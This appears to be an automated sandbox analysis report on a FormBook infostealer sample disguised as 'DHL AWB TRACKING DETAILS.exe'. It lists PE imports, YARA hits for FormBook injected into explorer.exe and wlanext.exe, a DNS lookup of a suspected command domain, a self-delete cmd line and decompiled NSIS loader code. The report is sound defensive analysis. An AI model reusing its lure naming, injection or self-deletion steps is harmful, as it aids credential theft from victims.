                  .rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.444878472222 | data | 5.17796812871 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data | 0x9000 | 0x1af98 | 0x400 | False | 0.55078125 | data | 4.68983486809 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .ndata | 0x24000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .rsrc | 0x2c000 | 0x900 | 0xa00 | False | 0.409375 | data | 3.94693169534 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  Name | RVA | Size | Type | Language | Country
                  RT_ICON | 0x2c190 | 0x2e8 | data | English | United States
                  RT_DIALOG | 0x2c478 | 0x100 | data | English | United States
                  RT_DIALOG | 0x2c578 | 0x11c | data | English | United States
                  RT_DIALOG | 0x2c698 | 0x60 | data | English | United States
                  RT_GROUP_ICON | 0x2c6f8 | 0x14 | data | English | United States
                  RT_MANIFEST | 0x2c710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
                  DLL | Import
                  KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                  USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                  GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                  SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                  ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                  COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                  ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                  VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                  Language of compilation system | Country where language is spoken | Map
                  English | United States |
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jan 28, 2022 10:56:53.209121943 CET | 54982 | 53 | 192.168.2.6 | 8.8.8.8
                  Jan 28, 2022 10:56:53.241837978 CET | 53 | 54982 | 8.8.8.8 | 192.168.2.6
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                  Jan 28, 2022 10:56:53.209121943 CET | 192.168.2.6 | 8.8.8.8 | 0x775b | Standard query (0) | www.chinaanalysisgroup.com | A (IP address) | IN (0x0001)
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                  Jan 28, 2022 10:56:53.241837978 CET | 8.8.8.8 | 192.168.2.6 | 0x775b | No error (0) | www.chinaanalysisgroup.com | | 94.136.40.51 | A (IP address) | IN (0x0001)


                  Target ID:0
                  Start time:10:54:31
                  Start date:28/01/2022
                  Path:C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe"
                  Imagebase:0x400000
                  File size:254216 bytes
                  MD5 hash:4E358B432BA956C13627BEEE054D68E5
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Target ID:1
                  Start time:10:54:33
                  Start date:28/01/2022
                  Path:C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe"
                  Imagebase:0x400000
                  File size:254216 bytes
                  MD5 hash:4E358B432BA956C13627BEEE054D68E5
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Target ID:4
                  Start time:10:54:38
                  Start date:28/01/2022
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0x7ff6f22f0000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:high

                  Target ID:11
                  Start time:10:55:07
                  Start date:28/01/2022
                  Path:C:\Windows\SysWOW64\wlanext.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\wlanext.exe
                  Imagebase:0xfa0000
                  File size:78848 bytes
                  MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:moderate

                  Target ID:12
                  Start time:10:55:13
                  Start date:28/01/2022
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:/c del "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe"
                  Imagebase:0x2a0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:13
                  Start time:10:55:14
                  Start date:28/01/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:20
                  Start time:10:55:43
                  Start date:28/01/2022
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
                  Imagebase:0x7ff7ebed0000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:31
                  Start time:10:56:35
                  Start date:28/01/2022
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
                  Imagebase:0x7ff6f22f0000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high


                    Execution Graph

                    Execution Coverage:19.5%
                    Dynamic/Decrypted Code Coverage:6.8%
                    Signature Coverage:22.7%
                    Total number of Nodes:1343
                    Total number of Limit Nodes:33
3943->3977 3945 23813b2 3944->3945 3944->3957 3947 2380267 11 API calls 3945->3947 3949 23813c8 3947->3949 3948 238137c 3948->3944 3948->3957 3950 2381422 3949->3950 3951 2380267 11 API calls 3949->3951 3949->3957 3952 2380267 11 API calls 3950->3952 3951->3949 3953 238143c 3952->3953 3954 2381445 SetThreadContext 3953->3954 3953->3957 3955 238146a 3954->3955 3954->3957 3956 23801b6 11 API calls 3955->3956 3956->3957 3957->3935 3959 2380282 3958->3959 3960 2380706 GetPEB 3959->3960 3961 23802a3 3960->3961 3962 23802ab 3961->3962 3963 2380335 3961->3963 3965 2380402 10 API calls 3962->3965 4011 2380180 3963->4011 3966 238031c 3965->3966 3966->3929 3968 23801d1 3967->3968 3969 2380706 GetPEB 3968->3969 3970 23801f2 3969->3970 3971 238023c 3970->3971 3972 23801f6 3970->3972 4014 2380192 3971->4014 3974 2380402 10 API calls 3972->3974 3975 2380231 3974->3975 3975->3935 3976->3939 3978 238037b 3977->3978 3986 2380706 GetPEB 3978->3986 3980 238039c 3981 23803a0 3980->3981 3982 23803e6 3980->3982 3988 2380402 GetPEB 3981->3988 4002 23801a4 3982->4002 3985 23803db 3985->3948 3987 2380729 3986->3987 3987->3980 3989 2380467 3988->3989 4005 2380744 GetPEB 3989->4005 3992 23804ec 3993 23804fd VirtualAlloc 3992->3993 3996 23805c2 3992->3996 3994 2380513 ReadFile 3993->3994 3993->3996 3995 2380528 VirtualAlloc 3994->3995 3994->3996 3995->3996 3999 2380549 3995->3999 3997 238060b 3996->3997 3998 2380600 VirtualFree 3996->3998 3997->3985 3998->3997 3999->3996 4000 23805b1 FindCloseChangeNotification 3999->4000 4001 23805b5 VirtualFree 3999->4001 4000->4001 4001->3996 4003 2380402 10 API calls 4002->4003 4004 23801ae 4003->4004 4004->3985 4006 2380757 4005->4006 4008 23804db CreateFileW 4006->4008 4009 2380616 GetPEB 4006->4009 4008->3992 4008->3996 4010 2380641 4009->4010 4010->4006 4012 2380402 10 API calls 4011->4012 4013 238018a 4012->4013 4013->3966 4015 2380402 10 API calls 4014->4015 4016 238019c 4015->4016 4016->3975 4854 401ca5 4855 4029cb 18 API calls 4854->4855 4856 
401cb5 SetWindowLongA 4855->4856 4857 40287d 4856->4857 4576 401a26 4577 4029cb 18 API calls 4576->4577 4578 401a2c 4577->4578 4579 4029cb 18 API calls 4578->4579 4580 4019d6 4579->4580 4858 4045aa 4859 4045d6 4858->4859 4860 4045ba 4858->4860 4862 404609 4859->4862 4863 4045dc SHGetPathFromIDListA 4859->4863 4869 40532a GetDlgItemTextA 4860->4869 4865 4045f3 SendMessageA 4863->4865 4866 4045ec 4863->4866 4864 4045c7 SendMessageA 4864->4859 4865->4862 4867 40140b 2 API calls 4866->4867 4867->4865 4869->4864 4581 402b2d 4582 402b55 4581->4582 4583 402b3c SetTimer 4581->4583 4584 402ba3 4582->4584 4585 402ba9 MulDiv 4582->4585 4583->4582 4586 402b63 wsprintfA SetWindowTextA SetDlgItemTextA 4585->4586 4586->4584 4870 401bad 4871 4029cb 18 API calls 4870->4871 4872 401bb4 4871->4872 4873 4029cb 18 API calls 4872->4873 4874 401bbe 4873->4874 4875 401bce 4874->4875 4876 4029e8 18 API calls 4874->4876 4877 401bde 4875->4877 4878 4029e8 18 API calls 4875->4878 4876->4875 4879 401be9 4877->4879 4880 401c2d 4877->4880 4878->4877 4882 4029cb 18 API calls 4879->4882 4881 4029e8 18 API calls 4880->4881 4883 401c32 4881->4883 4884 401bee 4882->4884 4885 4029e8 18 API calls 4883->4885 4886 4029cb 18 API calls 4884->4886 4888 401c3b FindWindowExA 4885->4888 4887 401bf7 4886->4887 4889 401c1d SendMessageA 4887->4889 4890 401bff SendMessageTimeoutA 4887->4890 4891 401c59 4888->4891 4889->4891 4890->4891 4588 40422e 4589 404264 4588->4589 4590 40423e 4588->4590 4592 403e9e 8 API calls 4589->4592 4591 403e37 19 API calls 4590->4591 4593 40424b SetDlgItemTextA 4591->4593 4594 404270 4592->4594 4593->4589 4595 402630 4596 4029e8 18 API calls 4595->4596 4597 402637 FindFirstFileA 4596->4597 4598 40265a 4597->4598 4602 40264a 4597->4602 4600 402661 4598->4600 4603 4059e3 wsprintfA 4598->4603 4604 405a85 lstrcpynA 4600->4604 4603->4600 4604->4602 4892 4024b0 4893 4024b5 4892->4893 4894 4024c6 4892->4894 4895 4029cb 18 API calls 4893->4895 4896 4029e8 18 API calls 4894->4896 4899 4024bc 
4895->4899 4897 4024cd lstrlenA 4896->4897 4897->4899 4898 40264e 4899->4898 4900 4024ec WriteFile 4899->4900 4900->4898 3456 4015b3 3457 4029e8 18 API calls 3456->3457 3458 4015ba 3457->3458 3474 40560c CharNextA CharNextA 3458->3474 3460 40160a 3462 40162d 3460->3462 3463 40160f 3460->3463 3461 4055a3 CharNextA 3464 4015d0 CreateDirectoryA 3461->3464 3468 401423 25 API calls 3462->3468 3465 401423 25 API calls 3463->3465 3466 4015e5 GetLastError 3464->3466 3470 4015c2 3464->3470 3467 401616 3465->3467 3469 4015f2 GetFileAttributesA 3466->3469 3466->3470 3480 405a85 lstrcpynA 3467->3480 3473 40215b 3468->3473 3469->3470 3470->3460 3470->3461 3472 401621 SetCurrentDirectoryA 3472->3473 3475 405626 3474->3475 3477 405632 3474->3477 3476 40562d CharNextA 3475->3476 3475->3477 3479 40564f 3476->3479 3478 4055a3 CharNextA 3477->3478 3477->3479 3478->3477 3479->3470 3480->3472 3481 401734 3482 4029e8 18 API calls 3481->3482 3483 40173b 3482->3483 3484 401761 3483->3484 3485 401759 3483->3485 3536 405a85 lstrcpynA 3484->3536 3535 405a85 lstrcpynA 3485->3535 3488 40176c 3537 405578 lstrlenA CharPrevA 3488->3537 3489 40175f 3492 405ce3 5 API calls 3489->3492 3495 40177e 3492->3495 3497 401795 CompareFileTime 3495->3497 3498 401859 3495->3498 3505 405aa7 18 API calls 3495->3505 3511 405a85 lstrcpynA 3495->3511 3518 401830 3495->3518 3519 40575c GetFileAttributesA CreateFileA 3495->3519 3540 405d7c FindFirstFileA 3495->3540 3543 40573d GetFileAttributesA 3495->3543 3546 405346 3495->3546 3497->3495 3499 404e23 25 API calls 3498->3499 3501 401863 3499->3501 3500 404e23 25 API calls 3507 401845 3500->3507 3520 402f01 3501->3520 3504 40188a SetFileTime 3506 40189c FindCloseChangeNotification 3504->3506 3505->3495 3506->3507 3508 4018ad 3506->3508 3509 4018b2 3508->3509 3510 4018c5 3508->3510 3512 405aa7 18 API calls 3509->3512 3513 405aa7 18 API calls 3510->3513 3511->3495 3514 4018ba lstrcatA 3512->3514 3515 4018cd 3513->3515 3514->3515 3517 405346 MessageBoxIndirectA 
3515->3517 3517->3507 3518->3500 3518->3507 3519->3495 3521 402f12 SetFilePointer 3520->3521 3522 402f2e 3520->3522 3521->3522 3550 40302c GetTickCount 3522->3550 3525 402f3f ReadFile 3526 402f5f 3525->3526 3534 401876 3525->3534 3527 40302c 42 API calls 3526->3527 3526->3534 3528 402f76 3527->3528 3529 402ff1 ReadFile 3528->3529 3530 402f86 3528->3530 3528->3534 3529->3534 3532 402fa1 ReadFile 3530->3532 3533 402fba WriteFile 3530->3533 3530->3534 3532->3530 3532->3534 3533->3530 3533->3534 3534->3504 3534->3506 3535->3489 3536->3488 3538 405592 lstrcatA 3537->3538 3539 401772 lstrcatA 3537->3539 3538->3539 3539->3489 3541 405d92 FindClose 3540->3541 3542 405d9d 3540->3542 3541->3542 3542->3495 3544 405759 3543->3544 3545 40574c SetFileAttributesA 3543->3545 3544->3495 3545->3544 3548 40535b 3546->3548 3547 4053a7 3547->3495 3548->3547 3549 40536f MessageBoxIndirectA 3548->3549 3549->3547 3551 403196 3550->3551 3552 40305b 3550->3552 3553 402bc5 32 API calls 3551->3553 3563 4031da SetFilePointer 3552->3563 3559 402f37 3553->3559 3555 403066 SetFilePointer 3560 40308b 3555->3560 3559->3525 3559->3534 3560->3559 3561 403120 WriteFile 3560->3561 3562 403177 SetFilePointer 3560->3562 3564 4031a8 ReadFile 3560->3564 3566 405e9d 3560->3566 3573 402bc5 3560->3573 3561->3559 3561->3560 3562->3551 3563->3555 3565 4031c9 3564->3565 3565->3560 3567 405ec2 3566->3567 3568 405eca 3566->3568 3567->3560 3568->3567 3569 405f51 GlobalFree 3568->3569 3570 405f5a GlobalAlloc 3568->3570 3571 405fd1 GlobalAlloc 3568->3571 3572 405fc8 GlobalFree 3568->3572 3569->3570 3570->3567 3570->3568 3571->3567 3571->3568 3572->3571 3574 402bd3 3573->3574 3575 402beb 3573->3575 3576 402be3 3574->3576 3577 402bdc DestroyWindow 3574->3577 3578 402bf3 3575->3578 3579 402bfb GetTickCount 3575->3579 3576->3560 3577->3576 3588 405ddc 3578->3588 3579->3576 3581 402c09 3579->3581 3582 402c11 3581->3582 3583 402c3e CreateDialogParamA 3581->3583 3582->3576 3592 402ba9 3582->3592 3583->3576 3585 402c1f 
wsprintfA 3586 404e23 25 API calls 3585->3586 3587 402c3c 3586->3587 3587->3576 3589 405df9 PeekMessageA 3588->3589 3590 405e09 3589->3590 3591 405def DispatchMessageA 3589->3591 3590->3576 3591->3589 3593 402bb8 3592->3593 3594 402bba MulDiv 3592->3594 3593->3594 3594->3585 4612 401634 4613 4029e8 18 API calls 4612->4613 4614 40163a 4613->4614 4615 405d7c 2 API calls 4614->4615 4616 401640 4615->4616 4617 401934 4618 4029cb 18 API calls 4617->4618 4619 40193b 4618->4619 4620 4029cb 18 API calls 4619->4620 4621 401945 4620->4621 4622 4029e8 18 API calls 4621->4622 4623 40194e 4622->4623 4624 401961 lstrlenA 4623->4624 4626 40199c 4623->4626 4625 40196b 4624->4625 4625->4626 4630 405a85 lstrcpynA 4625->4630 4628 401985 4628->4626 4629 401992 lstrlenA 4628->4629 4629->4626 4630->4628 4901 4019b5 4902 4029e8 18 API calls 4901->4902 4903 4019bc 4902->4903 4904 4029e8 18 API calls 4903->4904 4905 4019c5 4904->4905 4906 4019cc lstrcmpiA 4905->4906 4907 4019de lstrcmpA 4905->4907 4908 4019d2 4906->4908 4907->4908 4909 4014b7 4910 4014bd 4909->4910 4911 401389 2 API calls 4910->4911 4912 4014c5 4911->4912 4913 4025be 4914 4025c5 4913->4914 4920 40282a 4913->4920 4915 4029cb 18 API calls 4914->4915 4916 4025d0 4915->4916 4917 4025d7 SetFilePointer 4916->4917 4918 4025e7 4917->4918 4917->4920 4921 4059e3 wsprintfA 4918->4921 4921->4920

                    Control-flow Graph

                    [Control-flow graph figure; legend: Executed, Not Executed]
                    C-Code - Quality: 83%
                    			_entry_() {
                    				struct _SHFILEINFOA _v360;
                    				struct _SECURITY_ATTRIBUTES* _v376;
                    				char _v380;
                    				CHAR* _v384;
                    				char _v396;
                    				int _v400;
                    				int _v404;
                    				CHAR* _v408;
                    				intOrPtr _v412;
                    				int _v416;
                    				intOrPtr _v420;
                    				struct _SECURITY_ATTRIBUTES* _v424;
                    				void* _v432;
                    				int _t34;
                    				CHAR* _t39;
                    				char* _t42;
                    				signed int _t44;
                    				void* _t48;
                    				intOrPtr _t50;
                    				signed int _t52;
                    				signed int _t55;
                    				int _t56;
                    				signed int _t60;
                    				intOrPtr _t71;
                    				intOrPtr _t77;
                    				void* _t79;
                    				void* _t89;
                    				void* _t91;
                    				char* _t96;
                    				signed int _t97;
                    				void* _t98;
                    				signed int _t99;
                    				signed int _t100;
                    				signed int _t103;
                    				CHAR* _t105;
                    				signed int _t106;
                    				intOrPtr _t113;
                    				char _t120;
                    
                    				_v376 = 0;
                    				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                    				_t99 = 0;
                    				_v380 = 0x20;
                    				__imp__#17();
                    				_t34 = SetErrorMode(0x8001); // executed
                    				__imp__OleInitialize(0); // executed
                    				 *0x423f58 = _t34;
                    				 *0x423ea4 = E00405DA3(8);
                    				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
                    				E00405A85("nkdpnsqeoocyepqnevm Setup", "NSIS Error");
                    				_t39 = GetCommandLineA();
                    				_t96 = "\"C:\\Users\\engineer\\Desktop\\DHL AWB TRACKING DETAILS.exe\" ";
                    				E00405A85(_t96, _t39);
                    				 *0x423ea0 = GetModuleHandleA(0);
                    				_t42 = _t96;
                    				if("\"C:\\Users\\engineer\\Desktop\\DHL AWB TRACKING DETAILS.exe\" " == 0x22) {
                    					_v404 = 0x22;
                    					_t42 =  &M00429001;
                    				}
                    				_t44 = CharNextA(E004055A3(_t42, _v404));
                    				_v404 = _t44;
                    				while(1) {
                    					_t91 =  *_t44;
                    					_t109 = _t91;
                    					if(_t91 == 0) {
                    						break;
                    					}
                    					__eflags = _t91 - 0x20;
                    					if(_t91 != 0x20) {
                    						L5:
                    						__eflags =  *_t44 - 0x22;
                    						_v404 = 0x20;
                    						if( *_t44 == 0x22) {
                    							_t44 = _t44 + 1;
                    							__eflags = _t44;
                    							_v404 = 0x22;
                    						}
                    						__eflags =  *_t44 - 0x2f;
                    						if( *_t44 != 0x2f) {
                    							L15:
                    							_t44 = E004055A3(_t44, _v404);
                    							__eflags =  *_t44 - 0x22;
                    							if(__eflags == 0) {
                    								_t44 = _t44 + 1;
                    								__eflags = _t44;
                    							}
                    							continue;
                    						} else {
                    							_t44 = _t44 + 1;
                    							__eflags =  *_t44 - 0x53;
                    							if( *_t44 == 0x53) {
                    								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
                    								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
                    									_t99 = _t99 | 0x00000002;
                    									__eflags = _t99;
                    								}
                    							}
                    							__eflags =  *_t44 - 0x4352434e;
                    							if( *_t44 == 0x4352434e) {
                    								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
                    								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
                    									_t99 = _t99 | 0x00000004;
                    									__eflags = _t99;
                    								}
                    							}
                    							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
                    							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
                    								 *((intOrPtr*)(_t44 - 2)) = 0;
                    								_t45 = _t44 + 2;
                    								__eflags = _t44 + 2;
                    								E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t45);
                    								L20:
                    								_t105 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
                    								GetTempPathA(0x400, _t105);
                    								_t48 = E004031F1(_t109);
                    								_t110 = _t48;
                    								if(_t48 != 0) {
                    									L22:
                    									DeleteFileA("1033"); // executed
                    									_t50 = E00402C5B(_t111, _t99); // executed
                    									_v412 = _t50;
                    									if(_t50 != 0) {
                    										L32:
                    										E004035A6();
                    										__imp__OleUninitialize();
                    										if(_v408 == 0) {
